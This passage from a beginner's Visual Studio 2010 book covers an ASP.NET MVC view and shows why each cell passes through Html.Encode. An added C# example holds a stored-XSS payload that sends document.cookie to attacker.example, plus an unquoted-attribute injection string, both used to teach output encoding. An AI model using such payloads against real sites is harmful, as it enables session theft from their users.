272Microsoft Visual Studio 2010: A Beginner’s Guide
        <td>
            <%= Html.Encode(item.CustomerID) %>
        </td>
        <td>
            <%= Html.Encode(item.Name) %>
        </td>
        <td>
            <%= Html.Encode(item.Age) %>
        </td>
        <td>
            <%= Html.Encode(String.Format("{0:g}", item.Birthday)) %>
        </td>
        <td>
            <%= Html.Encode(String.Format("{0:F}", item.Income)) %>
        </td>
    </tr>
    <% } %>
</table>
<p>
    <%= Html.ActionLink("Create New", "Create") %>
</p>
</asp:Content>
Listing
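As an added example that is not part of the book's listing: the console program below uses System.Web.HttpUtility.HtmlEncode, the encoder that Html.Encode wraps in ASP.NET MVC 2, to render the same Customer row with and without encoding for a constructed Name value containing a script tag, and then shows the one HTML context where this encoding does not help, an unquoted attribute. The Customer class and the sample values are assumptions made for illustration; on .NET Framework 4 the project needs a reference to System.Web.dll.

```csharp
// Added example, not from the book: what Html.Encode does to a stored XSS payload,
// and where HTML encoding alone is not enough.
using System;
using System.Globalization;
using System.Web;   // HttpUtility.HtmlEncode (reference System.Web.dll on .NET Framework 4)

// Assumed model, matching the columns the book's view displays.
class Customer
{
    public int CustomerID { get; set; }
    public string Name { get; set; }
    public int Age { get; set; }
    public DateTime Birthday { get; set; }
    public decimal Income { get; set; }
}

static class Program
{
    // Same two steps Html.Encode performs: convert the value to a string, then HTML-encode it.
    static string Encode(object value)
    {
        return HttpUtility.HtmlEncode(Convert.ToString(value, CultureInfo.InvariantCulture));
    }

    // Renders one <tr> for a Customer. encode == false is what <%= item.Name %> would emit;
    // encode == true is what <%= Html.Encode(item.Name) %> emits.
    static string RenderRow(Customer item, bool encode)
    {
        Func<object, string> cell = v =>
            encode ? Encode(v) : Convert.ToString(v, CultureInfo.InvariantCulture);

        return "<tr>"
            + "<td>" + cell(item.CustomerID) + "</td>"
            + "<td>" + cell(item.Name) + "</td>"
            + "<td>" + cell(item.Age) + "</td>"
            + "<td>" + cell(String.Format(CultureInfo.InvariantCulture, "{0:g}", item.Birthday)) + "</td>"
            + "<td>" + cell(String.Format(CultureInfo.InvariantCulture, "{0:F}", item.Income)) + "</td>"
            + "</tr>";
    }

    static void Main()
    {
        // Constructed sample: the attacker typed a script tag into the Name box of the
        // Create form, and it was saved to the database unchanged.
        var hostile = new Customer
        {
            CustomerID = 7,
            Name = "<script>new Image().src='http://attacker.example/?c='+document.cookie</script>",
            Age = 33,
            Birthday = new DateTime(1988, 5, 17),
            Income = 52000.5m
        };

        Console.WriteLine("Raw output, the browser runs the script:");
        Console.WriteLine(RenderRow(hostile, false));
        Console.WriteLine();
        Console.WriteLine("Html.Encode output, the browser shows the script as text:");
        Console.WriteLine(RenderRow(hostile, true));

        // Caveat: HtmlEncode rewrites <, >, & and quotation marks but leaves space and '=' alone,
        // so it is only safe in HTML text (as in the book's <td> cells) or inside a quoted
        // attribute. Put the same encoded value into an unquoted attribute and it still breaks out.
        string attr = "x onmouseover=alert(1)";
        Console.WriteLine();
        Console.WriteLine("Unquoted attribute, still injectable: <td title=" + Encode(attr) + ">");
        Console.WriteLine("Quoted attribute, safe:               <td title=\"" + Encode(attr) + "\">");
    }
}
```

The same rule applies to other output contexts the view might use later: a value dropped into an inline script block needs JavaScript-string encoding and a value placed in a URL needs URL encoding; Html.Encode handles only HTML text and quoted attributes.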
For each cell being rendered, item is the current Customer, and the cell displays the Customer property that belongs in that column. What matters most about how the data is displayed is that every cell passes its value through the Html.Encode helper instead of writing it out directly with <%= %>. This is a security best practice: Html.Encode replaces characters such as <, > and & with their HTML entities, so whatever was stored is shown as literal text and is never treated as HTML markup or run as JavaScript you didn't intend. The habit of encoding every value, including the formatted Birthday and Income strings and even a numeric column like Age, is what keeps the view safe when a column later changes to free text. (Html.ActionLink encodes its link text for you, and on ASP.NET 4 the <%: item.Name %> syntax is shorthand for <%= Html.Encode(item.Name) %>.) The attack this prevents is cross-site scripting (XSS): a malicious user could type JavaScript into a field such as Name during data entry, and when you later display that field, the browser would try to run the JavaScript code, which